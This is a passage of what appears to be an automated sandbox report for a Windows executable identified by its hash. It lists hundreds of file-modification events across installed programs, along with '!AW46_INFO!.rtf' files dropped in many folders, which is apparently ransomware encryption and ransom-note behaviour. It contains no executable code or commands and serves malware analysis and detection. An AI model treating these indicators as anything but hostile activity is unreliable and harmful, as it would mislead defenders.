Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\he.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ms.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\Logo.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\UninstallDismount.odt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\tr.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\LICENSE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Amman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\mr.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sr.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\CompareEnter.wpl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files 